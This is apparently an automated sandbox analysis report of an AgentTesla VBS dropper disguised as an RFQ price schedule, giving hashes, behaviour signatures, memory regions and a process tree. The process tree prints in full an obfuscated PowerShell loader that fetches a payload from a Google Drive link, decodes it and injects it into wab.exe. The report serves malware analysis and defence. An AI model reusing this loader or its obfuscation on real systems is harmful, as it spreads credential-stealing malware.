Analysis

  • max time kernel
    144s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/05/2024, 03:42

General

  • Target

    RFQINL21052024_PRICE SCHEDULE.vbs

  • Size

    4KB

  • MD5

    de9bd11a9b255ed79c168051414c5ec2

  • SHA1

    863a99be31ef99e905bd44e472fd342b7104777b

  • SHA256

    841bfb8481e179f4d401d0b58b8230eb7c474914e3ca2e4e550e0dc9ef231113

  • SHA512

    361f095e88a387dd164350c35f80d4bc5ac1b440dc4cddff4c4e6529d863791a23997a5f97a0c803594c933dbc0fd537435b9b507815ca836396d0ec828a63bb

  • SSDEEP

    96:QhlUfeZsBmpDAcPV1kW//GOsxoJ8YFlRhpeilDg33FPU0C+WEKfp:Q3r8cPnx/Go5kilQfCXEKfp

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
        3⤵
          PID:5044
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
            4⤵
              PID:4608
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2484

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x341cxg3.ega.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\Vigesimation.Sor

              Filesize

              517KB

              MD5

              3d5345e787f5607ceeab0031c358f539

              SHA1

              19dc82bb214aa4cedc883e99d3d29b196d83a330

              SHA256

              dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2

              SHA512

              8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f

            • memory/404-33-0x0000000006EB0000-0x0000000006ECA000-memory.dmp

              Filesize

              104KB

            • memory/404-19-0x0000000006300000-0x0000000006366000-memory.dmp

              Filesize

              408KB

            • memory/404-34-0x0000000007BD0000-0x0000000007C66000-memory.dmp

              Filesize

              600KB

            • memory/404-15-0x0000000003030000-0x0000000003066000-memory.dmp

              Filesize

              216KB

            • memory/404-16-0x0000000005AC0000-0x00000000060E8000-memory.dmp

              Filesize

              6.2MB

            • memory/404-17-0x0000000005A90000-0x0000000005AB2000-memory.dmp

              Filesize

              136KB

            • memory/404-18-0x0000000006220000-0x0000000006286000-memory.dmp

              Filesize

              408KB

            • memory/404-36-0x0000000008BC0000-0x0000000009164000-memory.dmp

              Filesize

              5.6MB

            • memory/404-29-0x0000000006370000-0x00000000066C4000-memory.dmp

              Filesize

              3.3MB

            • memory/404-30-0x0000000006930000-0x000000000694E000-memory.dmp

              Filesize

              120KB

            • memory/404-31-0x0000000006960000-0x00000000069AC000-memory.dmp

              Filesize

              304KB

            • memory/404-32-0x0000000007F90000-0x000000000860A000-memory.dmp

              Filesize

              6.5MB

            • memory/404-35-0x0000000007B60000-0x0000000007B82000-memory.dmp

              Filesize

              136KB

            • memory/404-38-0x0000000009170000-0x000000000C2CC000-memory.dmp

              Filesize

              49.4MB

            • memory/916-58-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/916-40-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp

              Filesize

              8KB

            • memory/916-1-0x0000024137150000-0x0000024137172000-memory.dmp

              Filesize

              136KB

            • memory/916-0-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp

              Filesize

              8KB

            • memory/916-11-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/916-41-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/916-12-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/2484-54-0x0000000001270000-0x00000000024C4000-memory.dmp

              Filesize

              18.3MB

            • memory/2484-55-0x0000000001270000-0x00000000012B2000-memory.dmp

              Filesize

              264KB

            • memory/2484-59-0x0000000023A90000-0x0000000023AE0000-memory.dmp

              Filesize

              320KB

            • memory/2484-60-0x0000000023B80000-0x0000000023C12000-memory.dmp

              Filesize

              584KB

            • memory/2484-61-0x0000000023A80000-0x0000000023A8A000-memory.dmp

              Filesize

              40KB